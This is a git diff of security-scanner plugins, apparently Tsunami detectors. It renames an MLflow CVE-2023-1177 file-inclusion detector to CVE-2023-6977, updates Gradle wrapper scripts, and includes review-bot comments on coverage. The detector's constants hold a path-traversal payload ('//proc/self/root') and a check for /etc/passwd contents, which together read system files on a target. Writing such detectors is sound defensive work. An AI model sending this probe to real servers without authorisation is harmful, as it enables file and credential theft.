+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/mlflow_cve_2023_6977/gradlew.bat b/community/detectors/mlflow_cve_2023_6977/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/mlflow_cve_2023_6977/settings.gradle b/community/detectors/mlflow_cve_2023_6977/settings.gradle new file mode 100644 index 000000000..cb07619ce --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'mlflow_cve_2023_6977' diff --git a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java similarity index 86% rename from community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java rename to community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java index 275418731..88683af3b 100644 
--- a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java +++ b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java @@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,7 +13,7 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; +package com.google.tsunami.plugins.detectors.cves.cve20236977; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; @@ -50,15 +50,15 @@ import java.time.Instant; import javax.inject.Inject; -/** A {@link VulnDetector} that detects the CVE-2023-1177 vulnerability. */ +/** A {@link VulnDetector} that detects the CVE-2023-6977 vulnerability. */ @PluginInfo( type = PluginType.VULN_DETECTION, - name = "MLflow LFI/RFI CVE-2023-1177 Detector", - version = "0.1", - description = Cve20231177Detector.VULN_DESCRIPTION, - author = "hh-hunter", - bootstrapModule = Cve20231177DetectorBootstrapModule.class) -public final class Cve20231177Detector implements VulnDetector { + name = "MLflow LFI/RFI CVE-2023-6977 Detector", + version = "0.2", + description = Cve20236977Detector.VULN_DESCRIPTION, + author = "hh-hunter, frkngksl", + bootstrapModule = Cve20236977DetectorBootstrapModule.class) +public final class Cve20236977Detector implements VulnDetector { @VisibleForTesting static final String DETECTION_STRING = "root:x:0:0:root"; @VisibleForTesting static final String CREATE_DETECTION_STRING = "Tsunami-Test"; 
@@ -72,7 +72,9 @@ public final class Cve20231177Detector implements VulnDetector { + " host server, including any files stored in remote locations to which the host server" + " has access.This vulnerability can read arbitrary files. Since MLflow usually" + " configures s3 storage, it means that AWS account information can also be obtained," - + " and information such as local ssh private keys can also be read, resulting in RCE"; + + " and information such as local ssh private keys can also be read, resulting in RCE." + + " The vulnerability detected here is CVE-2023-6977 which is a bypass for both" + + " CVE-2023-1177 and CVE-2023-2780. Hence, this plugin encompasses them."; private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); @@ -88,14 +90,14 @@ public final class Cve20231177Detector implements VulnDetector { private static final String CREATE_MODEL_DATA = "{\"name\":\"REPLACE_FLAG\"}"; private static final String UPDATE_CREATE_MODEL_DATA = - "{\"name\":\"REPLACE_FLAG\",\"source\":\"file:///\"}"; + "{\"name\":\"REPLACE_FLAG\",\"source\":\"//proc/self/root\"}"; private final HttpClient httpClient; private final Clock utcClock; @Inject - Cve20231177Detector(@UtcClock Clock utcClock, HttpClient httpClient) { + Cve20236977Detector(@UtcClock Clock utcClock, HttpClient httpClient) { this.httpClient = checkNotNull(httpClient); this.utcClock = checkNotNull(utcClock); } @@ -103,7 +105,7 @@ public final class Cve20231177Detector implements VulnDetector { @Override public DetectionReportList detect( TargetInfo targetInfo, ImmutableList matchedServices) { - logger.atInfo().log("CVE-2023-1177 starts detecting."); + logger.atInfo().log("CVE-2023-6977 starts detecting."); return DetectionReportList.newBuilder() .addAllDetectionReports( 
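Review bot: The new `source` value in `UPDATE_CREATE_MODEL_DATA` resolves through procfs, so the check now silently assumes a Linux target, and nothing at the constant says so. How the constant is sent is outside this hunk, but if it is the only source value the detector uses, an unpatched MLflow host without /proc that the previous `file:///` value reached would presumably be reported as clean. A comment above the constant would make the assumption visible, for example `// Linux-only: source resolves through procfs; hosts without /proc are not covered by this check.` The README and `VULN_DESCRIPTION` both say the plugin encompasses CVE-2023-1177, so that coverage limit is worth stating there too.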
@@ -219,11 +221,18 @@ private DetectionReport buildDetectionReport(
 .setMainId(
 VulnerabilityId.newBuilder()
 .setPublisher("TSUNAMI_COMMUNITY")
- .setValue("CVE_2023_1177"))
+ .setValue("CVE_2023_6977"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6977"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-2780"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-1177"))
 .setSeverity(Severity.CRITICAL)
- .setTitle("CVE-2023-1177 MLflow LFI/RFI")
+ .setTitle("CVE-2023-6977 MLflow LFI/RFI")
 .setRecommendation(
- "1.Updated to version 2.2.1 or later\n2.Add authentication to MLflow server\n")
+ "1.Update to the version 2.10.0 or above\n"
+ + "2.Add authentication to MLflow server\n")
 .setDescription(VULN_DESCRIPTION))
 .build();
 }
diff --git a/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java
new file mode 100644
index 000000000..36402681d
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java
@@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236977; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2023-6977 Guice module that bootstraps the {@link Cve20236977Detector}. */ +public final class Cve20236977DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(Cve20236977Detector.class); + } +} diff --git a/community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java b/community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java similarity index 76% rename from community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java rename to community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java index d61391c3f..7190b1eb0 100644 --- a/community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java +++ b/community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java 
@@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,14 +13,14 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; +package com.google.tsunami.plugins.detectors.cves.cve20236977; import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.CREATE_DETECTION_STRING; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.DETECTION_STRING; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.VULN_DESCRIPTION; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.CREATE_DETECTION_STRING; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.DETECTION_STRING; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.VULN_DESCRIPTION; import com.google.common.collect.ImmutableList; import com.google.inject.Guice; @@ -49,14 +49,14 @@ import org.junit.runner.RunWith; import org.junit.runners.JUnit4; -/** Unit tests for {@link Cve20231177Detector}. */ +/** Unit tests for {@link Cve20236977Detector}. */ @RunWith(JUnit4.class) -public final class Cve20231177DetectorTest { +public final class Cve20236977DetectorTest { private final FakeUtcClock fakeUtcClock = FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); - @Inject private Cve20231177Detector detector; + @Inject private Cve20236977Detector detector; private MockWebServer mockWebServer; 
@@ -65,7 +65,7 @@ public void setUp() {
 mockWebServer = new MockWebServer();
 Guice.createInjector(
 new FakeUtcClockModule(fakeUtcClock),
- new Cve20231177DetectorBootstrapModule(),
+ new Cve20236977DetectorBootstrapModule(),
 new HttpClientModule.Builder().build())
 .injectMembers(this);
 }
@@ -106,12 +106,24 @@ public void detect_whenVulnerable_returnsVulnerability() throws IOException {
 .setMainId(
 VulnerabilityId.newBuilder()
 .setPublisher("TSUNAMI_COMMUNITY")
- .setValue("CVE_2023_1177"))
+ .setValue("CVE_2023_6977"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder()
+ .setPublisher("CVE")
+ .setValue("CVE-2023-6977"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder()
+ .setPublisher("CVE")
+ .setValue("CVE-2023-2780"))
+ .addRelatedId(
+ VulnerabilityId.newBuilder()
+ .setPublisher("CVE")
+ .setValue("CVE-2023-1177"))
 .setSeverity(Severity.CRITICAL)
- .setTitle("CVE-2023-1177 MLflow LFI/RFI")
+ .setTitle("CVE-2023-6977 MLflow LFI/RFI")
 .setRecommendation(
- "1.Updated to version 2.2.1 or later\n2.Add authentication to MLflow "
- + "server\n")
+ "1.Update to the version 2.10.0 or above\n"
+ + "2.Add authentication to MLflow server\n")
 .setDescription(VULN_DESCRIPTION))
 .build());
 }
@@ -141,6 +153,7 @@ private void mockWebResponse(String body) throws IOException {
 mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(CREATE_DETECTION_STRING));
 mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(CREATE_DETECTION_STRING));
 mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(body));
+ mockWebServer.enqueue(new MockResponse().setResponseCode(200));
 mockWebServer.start();
 }
 }
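Review bot: Nothing in these test hunks checks what the detector actually sends, so the extra response enqueued at the end of `mockWebResponse` and the switch to the new `source` value are both unverified. As far as the visible changes show, a detector that still sent the old `file:///` body would pass unchanged. After the detect call, the test could drain the recorded requests with `RecordedRequest request = mockWebServer.takeRequest();`, check that one `request.getBody().readUtf8()` contains `//proc/self/root`, and compare `mockWebServer.getRequestCount()` with the number of enqueued responses. `mockWebResponse` begins above this hunk, so the full list of queued responses is not visible here.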
diff --git a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/nacos_cve_2021_29441/gradlew b/community/detectors/nacos_cve_2021_29441/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/nacos_cve_2021_29441/gradlew +++ b/community/detectors/nacos_cve_2021_29441/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/nacos_cve_2021_29441/gradlew.bat b/community/detectors/nacos_cve_2021_29441/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/nacos_cve_2021_29441/gradlew.bat +++ b/community/detectors/nacos_cve_2021_29441/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
